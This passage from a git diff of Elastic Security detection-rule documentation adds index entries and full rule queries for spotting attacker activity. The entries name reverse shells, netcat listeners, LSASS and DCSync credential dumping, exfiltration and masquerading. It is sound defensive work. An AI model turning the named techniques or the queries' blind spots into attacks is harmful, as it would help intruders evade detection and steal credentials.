include::rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc[] include::rule-details/disable-windows-firewall-rules-via-netsh.asciidoc[] @@ -234,14 +235,18 @@ include::rule-details/enumeration-of-privileged-local-groups-membership.asciidoc include::rule-details/enumeration-of-users-or-groups-via-built-in-commands.asciidoc[] include::rule-details/exchange-mailbox-export-via-powershell.asciidoc[] include::rule-details/executable-file-creation-with-multiple-extensions.asciidoc[] +include::rule-details/executable-file-with-unusual-extension.asciidoc[] include::rule-details/execution-from-unusual-directory-command-line.asciidoc[] +include::rule-details/execution-from-a-removable-media-with-network-connection.asciidoc[] include::rule-details/execution-of-com-object-via-xwizard.asciidoc[] include::rule-details/execution-of-file-written-or-modified-by-microsoft-office.asciidoc[] include::rule-details/execution-of-file-written-or-modified-by-pdf-reader.asciidoc[] include::rule-details/execution-of-persistent-suspicious-program.asciidoc[] include::rule-details/execution-of-an-unsigned-service.asciidoc[] include::rule-details/execution-via-electron-child-process-node-js-module.asciidoc[] +include::rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc[] include::rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc[] +include::rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc[] include::rule-details/execution-via-tsclient-mountpoint.asciidoc[] include::rule-details/execution-via-windows-subsystem-for-linux.asciidoc[] include::rule-details/execution-via-local-sxs-shared-module.asciidoc[] @@ -332,6 +337,7 @@ include::rule-details/hping-process-activity.asciidoc[] include::rule-details/iis-http-logging-disabled.asciidoc[] include::rule-details/ipsec-nat-traversal-port-activity.asciidoc[] include::rule-details/image-file-execution-options-injection.asciidoc[] +include::rule-details/image-loaded-with-invalid-signature.asciidoc[] include::rule-details/imageload-via-windows-update-auto-update-client.asciidoc[] include::rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc[] include::rule-details/incoming-dcom-lateral-movement-via-mshta.asciidoc[] @@ -353,8 +359,8 @@ include::rule-details/kerberos-cached-credentials-dumping.asciidoc[] include::rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc[] include::rule-details/kerberos-traffic-from-unusual-process.asciidoc[] include::rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc[] -include::rule-details/kernel-module-removal.asciidoc[] include::rule-details/kernel-module-load-via-insmod.asciidoc[] +include::rule-details/kernel-module-removal.asciidoc[] include::rule-details/keychain-password-retrieval-via-command-line.asciidoc[] include::rule-details/kirbi-file-creation.asciidoc[] include::rule-details/kubernetes-anonymous-request-authorized.asciidoc[] @@ -387,10 +393,16 @@ include::rule-details/local-scheduled-task-creation.asciidoc[] include::rule-details/mfa-disabled-for-google-workspace-organization.asciidoc[] include::rule-details/ms-office-macro-security-registry-modifications.asciidoc[] include::rule-details/macos-installer-package-spawns-network-event.asciidoc[] +include::rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc[] +include::rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc[] +include::rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc[] +include::rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc[] +include::rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc[] include::rule-details/malicious-remote-file-creation.asciidoc[] include::rule-details/malware-detected-elastic-endgame.asciidoc[] include::rule-details/malware-prevented-elastic-endgame.asciidoc[] include::rule-details/masquerading-space-after-filename.asciidoc[] +include::rule-details/memory-dump-file-with-unusual-extension.asciidoc[] include::rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc[] include::rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc[] include::rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc[] @@ -452,6 +464,7 @@ include::rule-details/my-first-rule.asciidoc[] include::rule-details/ntds-or-sam-database-file-copied.asciidoc[] include::rule-details/namespace-manipulation-using-unshare.asciidoc[] include::rule-details/netcat-listener-established-inside-a-container.asciidoc[] +include::rule-details/netcat-listener-established-via-rlwrap.asciidoc[] include::rule-details/netsh-helper-dll.asciidoc[] include::rule-details/network-activity-detected-via-cat.asciidoc[] include::rule-details/network-connection-via-certutil.asciidoc[] @@ -515,21 +528,27 @@ include::rule-details/potential-cookies-theft-via-browser-debugging.asciidoc[] include::rule-details/potential-credential-access-via-dcsync.asciidoc[] include::rule-details/potential-credential-access-via-duplicatehandle-in-lsass.asciidoc[] include::rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc[] +include::rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc[] include::rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc[] include::rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc[] include::rule-details/potential-credential-access-via-windows-utilities.asciidoc[] include::rule-details/potential-cross-site-scripting-xss.asciidoc[] +include::rule-details/potential-dga-activity.asciidoc[] include::rule-details/potential-dll-side-loading-via-microsoft-antimalware-service-executable.asciidoc[] -include::rule-details/potential-dll-sideloading-via-trusted-microsoft-programs.asciidoc[] +include::rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[] include::rule-details/potential-dns-tunneling-via-nslookup.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc[] include::rule-details/potential-defense-evasion-via-cmstp-exe.asciidoc[] include::rule-details/potential-defense-evasion-via-proot.asciidoc[] include::rule-details/potential-disabling-of-apparmor.asciidoc[] include::rule-details/potential-disabling-of-selinux.asciidoc[] include::rule-details/potential-evasion-via-filter-manager.asciidoc[] -include::rule-details/potential-exfiltration-via-certreq.asciidoc[] include::rule-details/potential-exploitation-of-an-unquoted-service-path-vulnerability.asciidoc[] include::rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc[] +include::rule-details/potential-file-transfer-via-certreq.asciidoc[] include::rule-details/potential-hidden-local-user-account-creation.asciidoc[] include::rule-details/potential-hidden-process-via-mount-hidepid.asciidoc[] include::rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc[] @@ -543,6 +562,7 @@ include::rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc[] include::rule-details/potential-linux-backdoor-user-account-creation.asciidoc[] include::rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc[] include::rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc[] +include::rule-details/potential-linux-hack-tool-launched.asciidoc[] include::rule-details/potential-linux-local-account-brute-force-detected.asciidoc[] include::rule-details/potential-linux-ransomware-note-creation-detected.asciidoc[] include::rule-details/potential-linux-ssh-x11-forwarding.asciidoc[] @@ -559,6 +579,7 @@ include::rule-details/potential-meterpreter-reverse-shell.asciidoc[] include::rule-details/potential-microsoft-office-sandbox-evasion.asciidoc[] include::rule-details/potential-modification-of-accessibility-binaries.asciidoc[] include::rule-details/potential-network-scan-detected.asciidoc[] +include::rule-details/potential-network-scan-executed-from-host.asciidoc[] include::rule-details/potential-network-share-discovery.asciidoc[] include::rule-details/potential-network-sweep-detected.asciidoc[] include::rule-details/potential-non-standard-port-http-https-connection.asciidoc[] @@ -584,11 +605,13 @@ include::rule-details/potential-privilege-escalation-via-container-misconfigurat include::rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc[] include::rule-details/potential-privilege-escalation-via-overlayfs.asciidoc[] include::rule-details/potential-privilege-escalation-via-pkexec.asciidoc[] +include::rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc[] include::rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc[] include::rule-details/potential-privilege-escalation-via-sudoers-file-modification.asciidoc[] include::rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc[] include::rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc[] include::rule-details/potential-process-herpaderping-attempt.asciidoc[] +include::rule-details/potential-process-injection-from-malicious-document.asciidoc[] include::rule-details/potential-process-injection-via-powershell.asciidoc[] include::rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc[] include::rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc[] @@ -598,14 +621,15 @@ include::rule-details/potential-remote-code-execution-via-web-server.asciidoc[] include::rule-details/potential-remote-credential-access-via-registry.asciidoc[] include::rule-details/potential-remote-desktop-shadowing-activity.asciidoc[] include::rule-details/potential-remote-desktop-tunneling-detected.asciidoc[] +include::rule-details/potential-remote-file-execution-via-msiexec.asciidoc[] include::rule-details/potential-reverse-shell.asciidoc[] include::rule-details/potential-reverse-shell-activity-via-terminal.asciidoc[] include::rule-details/potential-reverse-shell-via-background-process.asciidoc[] include::rule-details/potential-reverse-shell-via-java.asciidoc[] include::rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc[] include::rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc[] -include::rule-details/potential-reverse-shell-via-suspicious-parent-process.asciidoc[] include::rule-details/potential-reverse-shell-via-udp.asciidoc[] +include::rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc[] include::rule-details/potential-syn-based-network-scan-detected.asciidoc[] include::rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc[] include::rule-details/potential-shadow-credentials-added-to-ad-object.asciidoc[] @@ -622,6 +646,7 @@ include::rule-details/potential-suspicious-clipboard-activity-detected.asciidoc[ include::rule-details/potential-suspicious-debugfs-root-device-access.asciidoc[] include::rule-details/potential-suspicious-file-edit.asciidoc[] include::rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc[] +include::rule-details/potential-upgrade-of-non-interactive-shell.asciidoc[] include::rule-details/potential-windows-error-manager-masquerading.asciidoc[] include::rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc[] include::rule-details/potential-macos-ssh-brute-force-detected.asciidoc[] @@ -697,6 +722,7 @@ include::rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc[ include::rule-details/remote-scheduled-task-creation.asciidoc[] include::rule-details/remote-system-discovery-commands.asciidoc[] include::rule-details/remote-windows-service-installed.asciidoc[] +include::rule-details/remote-xsl-script-execution-via-com.asciidoc[] include::rule-details/remotely-started-services-via-rpc.asciidoc[] include::rule-details/renamed-autoit-scripts-interpreter.asciidoc[] include::rule-details/renamed-utility-executed-with-short-program-name.asciidoc[] @@ -728,6 +754,7 @@ include::rule-details/service-creation-via-local-kerberos-authentication.asciido include::rule-details/service-disabled-via-registry-modification.asciidoc[] include::rule-details/service-path-modification.asciidoc[] include::rule-details/service-path-modification-via-sc-exe.asciidoc[] +include::rule-details/setcap-setuid-setgid-capability-set.asciidoc[] include::rule-details/setuid-setgid-bit-set-via-chmod.asciidoc[] include::rule-details/sharepoint-malware-file-upload.asciidoc[] include::rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc[] @@ -737,6 +764,8 @@ include::rule-details/signed-proxy-execution-via-ms-work-folders.asciidoc[] include::rule-details/softwareupdate-preferences-modification.asciidoc[] include::rule-details/solarwinds-process-disabling-services-via-registry.asciidoc[] include::rule-details/spike-in-aws-error-messages.asciidoc[] +include::rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc[] +include::rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc[] include::rule-details/spike-in-failed-logon-events.asciidoc[] include::rule-details/spike-in-firewall-denies.asciidoc[] include::rule-details/spike-in-logon-events.asciidoc[] @@ -773,6 +802,7 @@ include::rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc[] include::rule-details/suspicious-emond-child-process.asciidoc[] include::rule-details/suspicious-endpoint-security-parent-process.asciidoc[] include::rule-details/suspicious-execution-from-a-mounted-device.asciidoc[] +include::rule-details/suspicious-execution-via-msiexec.asciidoc[] include::rule-details/suspicious-execution-via-microsoft-office-add-ins.asciidoc[] include::rule-details/suspicious-execution-via-scheduled-task.asciidoc[] include::rule-details/suspicious-execution-via-windows-subsystem-for-linux.asciidoc[] @@ -823,11 +853,15 @@ include::rule-details/suspicious-symbolic-link-created.asciidoc[] include::rule-details/suspicious-sysctl-file-event.asciidoc[] include::rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc[] include::rule-details/suspicious-termination-of-esxi-process.asciidoc[] +include::rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc[] include::rule-details/suspicious-utility-launched-via-proxychains.asciidoc[] include::rule-details/suspicious-wmi-event-subscription-created.asciidoc[] include::rule-details/suspicious-wmi-image-load-from-ms-office.asciidoc[] include::rule-details/suspicious-wmic-xsl-script-execution.asciidoc[] include::rule-details/suspicious-werfault-child-process.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc[] include::rule-details/suspicious-zoom-child-process.asciidoc[] include::rule-details/suspicious-macos-ms-office-child-process.asciidoc[] include::rule-details/suspicious-which-enumeration.asciidoc[] @@ -844,6 +878,7 @@ include::rule-details/system-shells-via-services.asciidoc[] include::rule-details/system-time-discovery.asciidoc[] include::rule-details/systemkey-access-via-command-line.asciidoc[] include::rule-details/tcc-bypass-via-mounted-apfs-snapshot-access.asciidoc[] +include::rule-details/tainted-kernel-module-load.asciidoc[] include::rule-details/tampering-of-bash-command-line-history.asciidoc[] include::rule-details/temporarily-scheduled-task-creation.asciidoc[] include::rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc[] @@ -863,6 +898,8 @@ include::rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc[] include::rule-details/unauthorized-access-to-an-okta-application.asciidoc[] include::rule-details/uncommon-registry-persistence-change.asciidoc[] include::rule-details/unexpected-child-process-of-macos-screensaver-engine.asciidoc[] +include::rule-details/unix-socket-connection.asciidoc[] +include::rule-details/unsigned-bits-service-client-process.asciidoc[] include::rule-details/unsigned-dll-loaded-by-svchost.asciidoc[] include::rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc[] include::rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc[] @@ -907,6 +944,10 @@ include::rule-details/unusual-process-for-mssql-service-accounts.asciidoc[] include::rule-details/unusual-process-for-a-linux-host.asciidoc[] include::rule-details/unusual-process-for-a-windows-host.asciidoc[] include::rule-details/unusual-process-network-connection.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-host.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-parent-process.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-user.asciidoc[] +include::rule-details/unusual-process-writing-data-to-an-external-device.asciidoc[] include::rule-details/unusual-remote-file-directory.asciidoc[] include::rule-details/unusual-remote-file-extension.asciidoc[] include::rule-details/unusual-remote-file-size.asciidoc[] @@ -957,6 +998,7 @@ include::rule-details/windows-defender-disabled-via-registry-modification.asciid include::rule-details/windows-defender-exclusions-added-via-powershell.asciidoc[] include::rule-details/windows-event-logs-cleared.asciidoc[] include::rule-details/windows-firewall-disabled-via-powershell.asciidoc[] +include::rule-details/windows-installer-with-suspicious-properties.asciidoc[] include::rule-details/windows-network-enumeration.asciidoc[] include::rule-details/windows-registry-file-creation-in-smb-share.asciidoc[] include::rule-details/windows-script-executing-powershell.asciidoc[] diff --git a/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc index cffa3dfc6a..2ecd4fd11c 100644 --- a/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc @@ -36,7 +36,7 @@ Identifies the creation of a Process ID (PID), lock or reboot file created in te * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -90,6 +90,7 @@ This rule identifies the creation of PID, lock, or reboot files in the /var/run/ - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -105,7 +106,7 @@ user.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* o process.executable : ( ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/* )) -) and not process.name : (go or git) +) and not process.name : (go or git or containerd* or snap-confine) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc b/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc index 28781f6545..edffce920b 100644 --- a/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc @@ -33,10 +33,11 @@ Identify access to sensitive Active Directory object attributes that contains cr * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 7 +*Version*: 8 *Rule authors*: @@ -107,3 +108,23 @@ any where event.action == "Directory Service Access" and event.code == "4662" an ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Private Keys +** ID: T1552.004 +** Reference URL: https://attack.mitre.org/techniques/T1552/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc index 3cc8fa1a0b..c55fc27921 100644 --- a/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc @@ -29,10 +29,11 @@ Identifies when the SYSTEM account uses an account discovery utility. This could * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -99,3 +100,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: System Owner/User Discovery ** ID: T1033 ** Reference URL: https://attack.mitre.org/techniques/T1033/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc b/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc index b581885b31..a08c3c0601 100644 --- a/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc @@ -34,8 +34,9 @@ Identifies an attempt to reset a potentially privileged account password remotel * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Impact -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -78,3 +79,11 @@ sequence by winlog.computer_name with maxspan=5m ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Account Access Removal +** ID: T1531 +** Reference URL: https://attack.mitre.org/techniques/T1531/ diff --git a/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc b/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc index 28e8237bfc..f025155d26 100644 --- a/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc @@ -30,11 +30,12 @@ Adversaries can add the 'hidden' attribute to files to hide them from the user i * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -131,6 +132,14 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Hidden Files and Directories ** ID: T1564.001 ** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc index 4826df5ee9..956e8fcd74 100644 --- a/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc @@ -41,7 +41,7 @@ This rule detects the Active Directory query tool, AdFind.exe. AdFind has legiti * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -138,3 +138,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Domain Trust Discovery ** ID: T1482 ** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: System Network Configuration Discovery +** ID: T1016 +** Reference URL: https://attack.mitre.org/techniques/T1016/ diff --git a/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc index ccbc7ea0c5..505e0d3ba5 100644 --- a/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc @@ -33,7 +33,7 @@ Detects when an administrator role is assigned to an Okta group. An adversary ma * Data Source: Okta * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc index b5639b4aed..7ab9be3397 100644 --- a/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc @@ -33,7 +33,7 @@ Identifies when an administrator role is assigned to an Okta user. An adversary * Use Case: Identity and Access Audit * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc b/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc index 42e3a3838c..57c3ce56af 100644 --- a/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc @@ -35,7 +35,7 @@ Detects modifications in the AdminSDHolder object. Attackers can abuse the SDPro * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -60,3 +60,15 @@ event.action:"Directory Service Changes" and event.code:5136 and ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc b/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc index 80db9b226f..6e06092359 100644 --- a/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc @@ -36,7 +36,7 @@ Identifies a modification on the dsHeuristics attribute on the bit that holds th * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -107,3 +107,15 @@ any where event.action == "Directory Service Changes" and ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc index 83a90818c6..d572d80692 100644 --- a/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc @@ -36,7 +36,7 @@ Detects writing executable files that will be automatically launched by Adobe on * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -126,3 +126,7 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Services File Permissions Weakness ** ID: T1574.010 ** Reference URL: https://attack.mitre.org/techniques/T1574/010/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..eda6e92242 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc @@ -0,0 +1,83 @@ +[[archive-file-with-unusual-extension]] +=== Archive File with Unusual Extension + +Identifies the creation of an archive file with an unusual extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action != "deletion" and + + /* common archive file headers - Rar, 7z, GZIP, MSCF, XZ, ZIP */ + file.Ext.header_bytes : ("52617221*", "377ABCAF271C*", "1F8B*", "4d534346*", "FD377A585A00*", "504B0304*", "504B0708*") and + + ( + /* common image file extensions */ + file.extension : ("jpg", "jpeg", "emf", "tiff", "gif", "png", "bmp", "ico", "fpx", "eps", "inf") or + + /* common audio and video file extensions */ + file.extension : ("mp3", "wav", "avi", "mpeg", "flv", "wma", "wmv", "mov", "mp4", "3gp") or + + /* common document file extensions */ + (file.extension : ("doc", "docx", "rtf", "ppt", "pptx", "xls", "xlsx") and + + /* exclude ZIP file header values for OPENXML documents */ + not file.Ext.header_bytes : ("504B0304*", "504B0708*")) + ) and + + not (process.executable : "?:\\Windows\\System32\\inetsrv\\w3wp.exe" and file.path : "?:\\inetpub\\temp\\IIS Temporary Compressed Files\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc index 763537c19f..d1564a4240 100644 --- a/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc @@ -30,7 +30,7 @@ Identifies use of at.exe to interact with the task scheduler on remote hosts. Re * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -67,6 +67,10 @@ process where host.os.type == "windows" and event.type == "start" and process.na ** ID: T1053 ** Reference URL: https://attack.mitre.org/techniques/T1053/ * Sub-technique: +** Name: At +** 